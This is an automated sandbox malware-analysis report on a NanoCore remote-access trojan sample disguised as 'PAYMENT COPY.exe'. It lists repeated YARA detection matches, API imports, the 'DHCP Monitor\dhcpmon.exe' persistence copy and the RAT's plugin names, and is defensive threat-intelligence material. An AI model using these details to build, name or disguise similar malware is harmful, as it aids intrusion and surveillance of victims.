    Source: 1.2.PAYMENT COPY.exe.710000.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.366d53c.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 8.2.PAYMENT COPY.exe.247b9ec.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.23bc994.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.1.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.1.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.27b2a64.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.27b2a64.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.75e8a4.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.3295530.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.3295530.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.730000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.37b0e8f.29.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.750000.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.6c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.3.PAYMENT COPY.exe.387e041.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.3.PAYMENT COPY.exe.387e041.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.24228c4.18.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.3497815.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.660000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 7.2.PAYMENT COPY.exe.2a60000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 7.2.PAYMENT COPY.exe.2a60000.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 8.2.PAYMENT COPY.exe.34931ec.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.6e0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.3.PAYMENT COPY.exe.3883a6d.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 8.2.PAYMENT COPY.exe.34931ec.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.348e3b6.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.348e3b6.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 15.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.27bb8ec.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.241667c.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.241667c.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 15.2.dhcpmon.exe.22bcc90.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.241667c.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 14.2.dhcpmon.exe.2a61458.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 14.2.dhcpmon.exe.2a61458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.365ec98.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0.2.PAYMENT COPY.exe.2a80000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0.2.PAYMENT COPY.exe.2a80000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 15.2.dhcpmon.exe.47b0000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.47b0000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.1.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.1.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 15.2.dhcpmon.exe.3317815.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 7.2.PAYMENT COPY.exe.2a71458.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 7.2.PAYMENT COPY.exe.2a71458.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 8.2.PAYMENT COPY.exe.7eae40.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.7eae40.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.6b0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.33131ec.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0.2.PAYMENT COPY.exe.2a91458.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0.2.PAYMENT COPY.exe.2a91458.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.6c0000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.3663937.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.6a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.3.PAYMENT COPY.exe.3869a16.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.710000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.1.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.1.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.27bb8ec.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.330e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.330e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.27a65e4.21.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.48f0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.48f0000.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.680000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.730000.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.33131ec.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 8.2.PAYMENT COPY.exe.3415530.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.3415530.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.780000.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 8.2.PAYMENT COPY.exe.7eae40.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.7eae40.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 8.2.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 15.2.dhcpmon.exe.3295530.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.3295530.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 8.2.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 8.2.PAYMENT COPY.exe.48f0000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.48f0000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.3.PAYMENT COPY.exe.3869a16.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.3.PAYMENT COPY.exe.3869a16.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 14.2.dhcpmon.exe.2a50000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 14.2.dhcpmon.exe.2a50000.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.6f0000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.1.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.1.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 15.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 7.2.PAYMENT COPY.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 7.2.PAYMENT COPY.exe.2a60000.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.754c9f.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 7.2.PAYMENT COPY.exe.2a71458.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 7.2.PAYMENT COPY.exe.2a71458.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.6b0000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.22fba98.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.660000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.3415530.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.3415530.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.700000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.3.PAYMENT COPY.exe.3883a6d.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.3.PAYMENT COPY.exe.3883a6d.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Executable has a suspicious name (potential lure to open the executable)Show sources
    Source: PAYMENT COPY.exeStatic file information: Suspicious name
    Initial sample is a PE file and has a suspicious nameShow sources
    Source: initial sampleStatic PE information: Filename: PAYMENT COPY.exe
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403486
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 10_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,10_2_00403486
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_004072720_2_00407272
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_00406A9B0_2_00406A9B
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_73581A980_2_73581A98
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_0040A2A51_2_0040A2A5
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_2_007833241_2_00783324
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 1_1_0040A2A51_1_0040A2A5
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_0040A2A58_2_0040A2A5
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_0499E4808_2_0499E480
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_0499E4708_2_0499E470
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_0499BBD48_2_0499BBD4
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_051CF5F88_2_051CF5F8
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_051C97888_2_051C9788
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_051CA5F88_2_051CA5F8
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 8_2_051CA6108_2_051CA610
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 10_2_0040727210_2_00407272
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 10_2_00406A9B10_2_00406A9B
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_0040A2A515_2_0040A2A5
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_04D6E48015_2_04D6E480
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_04D6E47115_2_04D6E471
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_04D6E47B15_2_04D6E47B
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_04D6BBD415_2_04D6BBD4
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_0509F5F815_2_0509F5F8
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_0509978815_2_05099788
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_0509A5D015_2_0509A5D0
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_0509A61015_2_0509A610
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_05243E3015_2_05243E30
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_05244A5015_2_05244A50
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_05244B0815_2_05244B08
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: String function: 00401ED0 appears 69 times
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: String function: 0040569E appears 54 times
    Source: PAYMENT COPY.exe, 00000000.00000003.238893639.0000000002DCF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000000.00000002.240855252.00000000022F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exeBinary or memory string: OriginalFilename vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.500337236.0000000000730000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.500528462.0000000000780000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.499927530.00000000006C0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameFileBrowserClient.dllT vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.505736368.000000000341C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.505736368.000000000341C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.506109620.0000000003650000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.506109620.0000000003650000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNAudio.dll4 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.506109620.0000000003650000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.500087557.00000000006E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMyClientPlugin.dll4 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCoreClientPlugin.dll8 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNanoCoreBase.dll< vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMyClientPluginNew.dll4 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMyClientPlugin.dll@ vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000001.00000002.501309782.0000000002391000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000007.00000003.254565501.0000000002C16000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000007.00000002.261551351.00000000022E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000008.00000002.279599268.0000000005360000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000008.00000002.278420831.0000000002460000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000008.00000002.278420831.0000000002460000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClientPlugin.dll4 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exe, 00000008.00000002.278506705.000000000344C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLzma#.dll4 vs PAYMENT COPY.exe
    Source: PAYMENT COPY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: 00000001.00000002.498580778.0000000000599000.00000004.00000020.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
    Source: 00000001.00000002.498580778.0000000000599000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000001.00000002.500337236.0000000000730000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
